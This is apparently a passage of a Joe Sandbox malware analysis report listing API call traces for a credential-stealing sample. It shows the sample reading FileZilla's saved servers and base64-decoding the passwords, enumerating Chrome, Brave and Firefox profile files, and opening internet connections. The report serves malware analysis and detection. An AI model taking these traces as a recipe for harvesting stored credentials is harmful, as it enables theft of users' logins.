                            • lstrcpy.KERNEL32(00000000,00000000), ref: 008F3BB3
                            • lstrcat.KERNEL32(00000000,?), ref: 008F3BC1
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 008F3BEA
                            • lstrcpy.KERNEL32(00000000,0090CFF4), ref: 008F3C2E
                            • lstrlen.KERNEL32(?), ref: 008F3C38
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 008F3C65
                            • lstrcat.KERNEL32(00000000,00000000), ref: 008F3C70
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 008F3C96
                            • lstrlen.KERNEL32(0091179C), ref: 008F3CA8
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 008F3CCA
                            • lstrcat.KERNEL32(00000000,0091179C), ref: 008F3CD6
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 008F3CFE
                            • lstrlen.KERNEL32(?), ref: 008F3D12
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 008F3D32
                            • lstrcat.KERNEL32(00000000,?), ref: 008F3D40
                            • lstrlen.KERNEL32(012F92F0), ref: 008F3D6B
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 008F3D91
                            • lstrcat.KERNEL32(00000000,00000000), ref: 008F3D9C
                            • lstrlen.KERNEL32(012F93E0), ref: 008F3DBE
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 008F3DE4
                            • lstrcat.KERNEL32(00000000,00000000), ref: 008F3DEF
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 008F3E17
                            • lstrlen.KERNEL32(0091179C), ref: 008F3E29
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 008F3E48
                            • lstrcat.KERNEL32(00000000,0091179C), ref: 008F3E54
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 008F3E7A
                            • lstrcpy.KERNEL32(00000000,?), ref: 008F3EA7
                            • lstrcat.KERNEL32(00000000,00000000), ref: 008F3EB2
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 008F3ED9
                            • lstrlen.KERNEL32(0091179C), ref: 008F3EEB
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 008F3F0D
                            • lstrcat.KERNEL32(00000000,0091179C), ref: 008F3F19
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 008F3F42
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 008F3F71
                            • lstrcat.KERNEL32(00000000,00000000), ref: 008F3F7C
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 008F3FA3
                            • lstrlen.KERNEL32(0091179C), ref: 008F3FB5
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 008F3FD7
                            • lstrcat.KERNEL32(00000000,0091179C), ref: 008F3FE3
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 008F400C
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 008F403B
                            • lstrcat.KERNEL32(00000000,00000000), ref: 008F4046
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 008F406D
                            • lstrlen.KERNEL32(0091179C), ref: 008F407F
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 008F40A1
                            • lstrcat.KERNEL32(00000000,0091179C), ref: 008F40AD
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 008F40D5
                            • lstrlen.KERNEL32(?), ref: 008F40E9
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 008F4109
                            • lstrcat.KERNEL32(00000000,?), ref: 008F4117
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 008F4140
                            • lstrcpy.KERNEL32(00000000,0090CFF4), ref: 008F417F
                            • lstrlen.KERNEL32(012FDF80), ref: 008F418E
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 008F41B6
                            • lstrcat.KERNEL32(00000000,00000000), ref: 008F41C1
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 008F41EA
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 008F422E
                            • lstrcat.KERNEL32(00000000), ref: 008F423B
                            • FindNextFileA.KERNEL32(00000000,?), ref: 008F4439
                            • FindClose.KERNEL32(00000000), ref: 008F4448
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.2276297056.00000000008E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                            • Associated: 00000001.00000002.2276280362.00000000008E0000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2276297056.0000000000917000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2276297056.000000000096E000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2276297056.0000000000976000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2276297056.000000000098F000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2276297056.0000000000B18000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2276509130.0000000000B2A000.00000008.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2276526365.0000000000B2C000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2276526365.0000000000CB3000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2276526365.0000000000D92000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2276526365.0000000000DBB000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2276526365.0000000000DC2000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2276526365.0000000000DD1000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2276987124.0000000000DD2000.00000080.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2277135726.0000000000F6C000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2277156887.0000000000F6D000.00000080.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_8e0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcpy$lstrcat$lstrlen$Find$File$CloseFirstNextwsprintf
                            • String ID: %s\*.*
                            • API String ID: 1006159827-1013718255
                            • Opcode ID: 31d7a2c20cb8b8617ada87d1a200cd96ecc03173bc21382382917b98d949e198
                            • Instruction ID: c17715f4a4842e8fe666e3dff1361295290ce2bb645a9989f62d68a275374d58
                            • Opcode Fuzzy Hash: 31d7a2c20cb8b8617ada87d1a200cd96ecc03173bc21382382917b98d949e198
                            • Instruction Fuzzy Hash: 7D627A3191165AABCB21AF79CC48AAFB7B9FF45700F448128BA05E3251DF74EE41CB91
                            APIs
                            • lstrcpy.KERNEL32(00000000,0090CFF4), ref: 008F6AD5
                            • SHGetFolderPathA.SHELL32(00000000,00000028,00000000,00000000,?), ref: 008F6B08
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 008F6B42
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 008F6B69
                            • lstrcat.KERNEL32(00000000,00000000), ref: 008F6B74
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 008F6B9D
                            • lstrlen.KERNEL32(\AppData\Roaming\FileZilla\recentservers.xml), ref: 008F6BB7
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 008F6BD9
                            • lstrcat.KERNEL32(00000000,\AppData\Roaming\FileZilla\recentservers.xml), ref: 008F6BE5
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 008F6C10
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 008F6C40
                            • LocalAlloc.KERNEL32(00000040,?), ref: 008F6C75
                            • lstrcpy.KERNEL32(00000000,0090CFF4), ref: 008F6CDD
                            • lstrcpy.KERNEL32(00000000,0090CFF4), ref: 008F6D0D
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.2276297056.00000000008E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                            • Associated: 00000001.00000002.2276280362.00000000008E0000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2276297056.0000000000917000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2276297056.000000000096E000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2276297056.0000000000976000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2276297056.000000000098F000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2276297056.0000000000B18000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2276509130.0000000000B2A000.00000008.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2276526365.0000000000B2C000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2276526365.0000000000CB3000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2276526365.0000000000D92000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2276526365.0000000000DBB000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2276526365.0000000000DC2000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2276526365.0000000000DD1000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2276987124.0000000000DD2000.00000080.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2277135726.0000000000F6C000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2277156887.0000000000F6D000.00000080.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_8e0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcpy$lstrcat$AllocFolderLocalPathlstrlen
                            • String ID: <Host>$<Pass encoding="base64">$<Port>$<User>$\AppData\Roaming\FileZilla\recentservers.xml$browser: FileZilla$login: $password: $profile: null$url:
                            • API String ID: 313953988-555421843
                            • Opcode ID: 506eb60b8f98fd599e16dd4c67befd67216696d6b40a7bf8d711b929c4786567
                            • Instruction ID: 86b4368a407828dc5745b510581499715ef16698c99accdb7ab608ffe39a19cf
                            • Opcode Fuzzy Hash: 506eb60b8f98fd599e16dd4c67befd67216696d6b40a7bf8d711b929c4786567
                            • Instruction Fuzzy Hash: 1042C171A0025AAFDB21ABB5DC49FAE7BB9FF45700F444524FA01E7281EF70D9128B61
                            APIs
                            • lstrcpy.KERNEL32(00000000,?), ref: 008E60FF
                            • lstrcpy.KERNEL32(00000000,0090CFF4), ref: 008E6152
                            • lstrcpy.KERNEL32(00000000,0090CFF4), ref: 008E6185
                            • lstrcpy.KERNEL32(00000000,0090CFF4), ref: 008E61B5
                            • lstrcpy.KERNEL32(00000000,0090CFF4), ref: 008E61F0
                            • lstrcpy.KERNEL32(00000000,0090CFF4), ref: 008E6223
                            • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 008E6233
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.2276297056.00000000008E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                            • Associated: 00000001.00000002.2276280362.00000000008E0000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2276297056.0000000000917000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2276297056.000000000096E000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2276297056.0000000000976000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2276297056.000000000098F000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2276297056.0000000000B18000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2276509130.0000000000B2A000.00000008.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2276526365.0000000000B2C000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2276526365.0000000000CB3000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2276526365.0000000000D92000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2276526365.0000000000DBB000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2276526365.0000000000DC2000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2276526365.0000000000DD1000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2276987124.0000000000DD2000.00000080.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2277135726.0000000000F6C000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2277156887.0000000000F6D000.00000080.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_8e0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcpy$InternetOpen
                            • String ID: "$------
                            • API String ID: 2041821634-2370822465
                            • Opcode ID: 47fe3005cd663e7528679c2a26c8981cac9d45f3bd6951f302a1f0cc2180f5c7
                            • Instruction ID: e78a40140879c8a5f562f70ef6932e33a55950b1117435f2d968bb6eabbfa62f
                            • Opcode Fuzzy Hash: 47fe3005cd663e7528679c2a26c8981cac9d45f3bd6951f302a1f0cc2180f5c7
                            • Instruction Fuzzy Hash: 1F527C71D00256AFCB21ABB9DC49BAE77B9FF56350F148024F805E7291EB74ED028B91
                            APIs
                            • lstrcpy.KERNEL32(00000000,0090CFF4), ref: 008F6CDD
                            • lstrcpy.KERNEL32(00000000,0090CFF4), ref: 008F6D0D
                            • lstrcpy.KERNEL32(00000000,0090CFF4), ref: 008F6D3D
                            • lstrcpy.KERNEL32(00000000,0090CFF4), ref: 008F6D6F
                            • GetProcessHeap.KERNEL32(00000000,000F423F), ref: 008F6D7C
                            • RtlAllocateHeap.NTDLL(00000000), ref: 008F6D83
                            • StrStrA.SHLWAPI(00000000,<Host>), ref: 008F6D9A
                            • lstrlen.KERNEL32(00000000), ref: 008F6DA5
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 008F6DE8
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 008F6E0F
                            • StrStrA.SHLWAPI(00000000,<Port>), ref: 008F6E22
                            • lstrlen.KERNEL32(00000000), ref: 008F6E2D
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 008F6E70
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 008F6E97
                            • StrStrA.SHLWAPI(00000000,<User>), ref: 008F6EAA
                            • lstrlen.KERNEL32(00000000), ref: 008F6EB5
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 008F6EF8
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 008F6F1F
                            • StrStrA.SHLWAPI(00000000,<Pass encoding="base64">), ref: 008F6F32
                            • lstrlen.KERNEL32(00000000), ref: 008F6F41
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 008F6F89
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 008F6FB1
                            • CryptStringToBinaryA.CRYPT32(00000000,00000000,00000001,00000000,?,00000000,00000000), ref: 008F6FD4
                            • LocalAlloc.KERNEL32(00000040,00000000), ref: 008F6FE8
                            • CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00000000,00000000,00000000), ref: 008F7009
                            • LocalFree.KERNEL32(00000000), ref: 008F7014
                            • lstrlen.KERNEL32(?), ref: 008F70AE
                            • lstrlen.KERNEL32(?), ref: 008F70C1
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.2276297056.00000000008E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                            • Associated: 00000001.00000002.2276280362.00000000008E0000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2276297056.0000000000917000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2276297056.000000000096E000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2276297056.0000000000976000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2276297056.000000000098F000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2276297056.0000000000B18000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2276509130.0000000000B2A000.00000008.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2276526365.0000000000B2C000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2276526365.0000000000CB3000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2276526365.0000000000D92000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2276526365.0000000000DBB000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2276526365.0000000000DC2000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2276526365.0000000000DD1000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2276987124.0000000000DD2000.00000080.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2277135726.0000000000F6C000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2277156887.0000000000F6D000.00000080.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_8e0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcpy$lstrlen$BinaryCryptHeapLocalString$AllocAllocateFreeProcess
                            • String ID: <Host>$<Pass encoding="base64">$<Port>$<User>$browser: FileZilla$login: $password: $profile: null$url:
                            • API String ID: 2641759534-2314656281
                            • Opcode ID: 96e5ff66b758e6a28234edf1d04f2d378d2fdfe48edbc475c11cff2296ee123d
                            • Instruction ID: fa9597fba214c9ef87751bdccec6aa7834ddc36808913c54c446d0dc472789da
                            • Opcode Fuzzy Hash: 96e5ff66b758e6a28234edf1d04f2d378d2fdfe48edbc475c11cff2296ee123d
                            • Instruction Fuzzy Hash: B602EF71A0025AAFDB20ABB4DC49FAE7BB9FF49700F544524F902E7281EF70D9128761
                            APIs
                            • lstrcpy.KERNEL32(00000000,0090CFF4), ref: 008EDBD3
                            • lstrcpy.KERNEL32(00000000,?), ref: 008EDC1E
                            • lstrcpy.KERNEL32(00000000,0090CFF4), ref: 008EDC5F
                            • lstrcpy.KERNEL32(00000000,0090CFF4), ref: 008EDC8F
                            • FindFirstFileA.KERNEL32(?,?), ref: 008EDCA0
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.2276297056.00000000008E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                            • Associated: 00000001.00000002.2276280362.00000000008E0000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2276297056.0000000000917000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2276297056.000000000096E000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2276297056.0000000000976000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2276297056.000000000098F000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2276297056.0000000000B18000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2276509130.0000000000B2A000.00000008.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2276526365.0000000000B2C000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2276526365.0000000000CB3000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2276526365.0000000000D92000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2276526365.0000000000DBB000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2276526365.0000000000DC2000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2276526365.0000000000DD1000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2276987124.0000000000DD2000.00000080.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2277135726.0000000000F6C000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2277156887.0000000000F6D000.00000080.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_8e0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcpy$FileFindFirst
                            • String ID: Brave$Google Chrome$Preferences$\Brave\Preferences
                            • API String ID: 157892242-726946144
                            • Opcode ID: 80dd9c050da7de6494d8fbbfbbe47a8909d52e4b455d8cf6632638244dc360f5
                            • Instruction ID: 327c74df2d93d469b8085486b3ab434b71c9186d6d8e355b0192b3c6484046ab
                            • Opcode Fuzzy Hash: 80dd9c050da7de6494d8fbbfbbe47a8909d52e4b455d8cf6632638244dc360f5
                            • Instruction Fuzzy Hash: 47B2A171A013959FCB24EF6AD844A9ABBF5FF49314F188168E809E7391DB70EC45CB81
                            APIs
                            • lstrcpy.KERNEL32(00000000,0090CFF4), ref: 008F4CB1
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 008F4CD4
                            • lstrcat.KERNEL32(00000000,00000000), ref: 008F4CDF
                            • lstrlen.KERNEL32(00914CAC), ref: 008F4CEA
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 008F4D07
                            • lstrcat.KERNEL32(00000000,00914CAC), ref: 008F4D13
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 008F4D3E
                            • FindFirstFileA.KERNEL32(00000000,?), ref: 008F4D5A
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.2276297056.00000000008E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                            • Associated: 00000001.00000002.2276280362.00000000008E0000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2276297056.0000000000917000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2276297056.000000000096E000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2276297056.0000000000976000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2276297056.000000000098F000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2276297056.0000000000B18000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2276509130.0000000000B2A000.00000008.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2276526365.0000000000B2C000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2276526365.0000000000CB3000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2276526365.0000000000D92000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2276526365.0000000000DBB000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2276526365.0000000000DC2000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2276526365.0000000000DD1000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2276987124.0000000000DD2000.00000080.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2277135726.0000000000F6C000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2277156887.0000000000F6D000.00000080.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_8e0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcpy$lstrcat$FileFindFirstlstrlen
                            • String ID: prefs.js
                            • API String ID: 2567437900-3783873740
                            • Opcode ID: b5b29237676502be58061e02f472686249eeb0264eeed3757913c85c03d47a51
                            • Instruction ID: ccd77b99d1ac1f418e142524ed42eed78cd162ae7b7777c6b570031b46138c78
                            • Opcode Fuzzy Hash: b5b29237676502be58061e02f472686249eeb0264eeed3757913c85c03d47a51
                            • Instruction Fuzzy Hash: 4D925C70A016099FDB24DF29C958A6AB7E5FF44714F19C0ADEA09DB3A1DB71DC82CB40
                            APIs
                            • lstrcpy.KERNEL32(00000000,0090CFF4), ref: 008F13E1
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 008F1404
                            • lstrcat.KERNEL32(00000000,00000000), ref: 008F140F
                            • lstrlen.KERNEL32(00914CAC), ref: 008F141A
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 008F1437
                            • lstrcat.KERNEL32(00000000,00914CAC), ref: 008F1443
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 008F146E
                            • FindFirstFileA.KERNEL32(00000000,?), ref: 008F148A
                            • StrCmpCA.SHLWAPI(?,009117A8), ref: 008F14AC
                            • StrCmpCA.SHLWAPI(?,009117AC), ref: 008F14C6
                            • lstrcpy.KERNEL32(00000000,0090CFF4), ref: 008F14FF
                            • lstrcpy.KERNEL32(00000000,?), ref: 008F1527
                            • lstrcat.KERNEL32(00000000,00000000), ref: 008F1532
                            • lstrlen.KERNEL32(0091179C), ref: 008F153D
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 008F155A
                            • lstrcat.KERNEL32(00000000,0091179C), ref: 008F1566
                            • lstrlen.KERNEL32(?), ref: 008F1573
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 008F1593
                            • lstrcat.KERNEL32(00000000,?), ref: 008F15A1
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 008F15CA
                            • StrCmpCA.SHLWAPI(?,012FDF20), ref: 008F15F3
                            • lstrcpy.KERNEL32(00000000,?), ref: 008F1634
                            • lstrcpy.KERNEL32(00000000,?), ref: 008F165D
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 008F1685
                            • StrCmpCA.SHLWAPI(?,012FE0A0), ref: 008F16A2
                            • lstrcpy.KERNEL32(00000000,?), ref: 008F16E3
                            • lstrcpy.KERNEL32(00000000,?), ref: 008F170C
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 008F1734
                            • StrCmpCA.SHLWAPI(?,012FDF50), ref: 008F1752
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 008F1783
                            • lstrcpy.KERNEL32(00000000,?), ref: 008F17AC
                            • lstrcpy.KERNEL32(00000000,?), ref: 008F17D5
                            • StrCmpCA.SHLWAPI(?,012FDEC0), ref: 008F1803
                            • lstrcpy.KERNEL32(00000000,?), ref: 008F1844
                            • lstrcpy.KERNEL32(00000000,?), ref: 008F186D
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 008F1895
                            • lstrcpy.KERNEL32(00000000,?), ref: 008F18E6
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 008F190E
                            • lstrcpy.KERNEL32(00000000,?), ref: 008F1945
                            • FindNextFileA.KERNEL32(00000000,?), ref: 008F196C
                            • FindClose.KERNEL32(00000000), ref: 008F197B
                            Memory Dump Source
                            • Source File: 00000001.00000002.2276297056.00000000008E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                            • Associated: 00000001.00000002.2276280362.00000000008E0000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2276297056.0000000000917000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2276297056.000000000096E000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2276297056.0000000000976000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2276297056.000000000098F000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2276297056.0000000000B18000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2276509130.0000000000B2A000.00000008.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2276526365.0000000000B2C000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2276526365.0000000000CB3000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2276526365.0000000000D92000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2276526365.0000000000DBB000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2276526365.0000000000DC2000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2276526365.0000000000DD1000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2276987124.0000000000DD2000.00000080.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2277135726.0000000000F6C000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2277156887.0000000000F6D000.00000080.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_8e0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcpy$lstrcat$Findlstrlen$File$CloseFirstNext
                            • String ID:
                            • API String ID: 1346933759-0
                            • Opcode ID: 885cec85527c2adb355aaaa2705fc317cdca72dff9dfef9facaf4e9c9648b2b8
                            • Instruction ID: 78ce7b3b0234dcab00e1bc7c81ea3dd471a983f1ef7e45243eefaf39f3d20e56
                            • Opcode Fuzzy Hash: 885cec85527c2adb355aaaa2705fc317cdca72dff9dfef9facaf4e9c9648b2b8
                            • Instruction Fuzzy Hash: 32126A71A1024A9BCF24AF79D89DAAE7BB8FF44300F448528A946E7251DF34DD418B91
                            APIs
                            • wsprintfA.USER32 ref: 008FCDEC
                            • FindFirstFileA.KERNEL32(?,?), ref: 008FCE03
                            • lstrcat.KERNEL32(?,?), ref: 008FCE4F
                            • StrCmpCA.SHLWAPI(?,009117A8), ref: 008FCE61
                            • StrCmpCA.SHLWAPI(?,009117AC), ref: 008FCE7B
                            • wsprintfA.USER32 ref: 008FCEA0
                            • PathMatchSpecA.SHLWAPI(?,012F9350), ref: 008FCED2
                            • CoInitialize.OLE32(00000000), ref: 008FCEDE
                              • Part of subcall function 008FCCD0: CoCreateInstance.COMBASE(0090B118,00000000,00000001,0090B108,?), ref: 008FCCF6
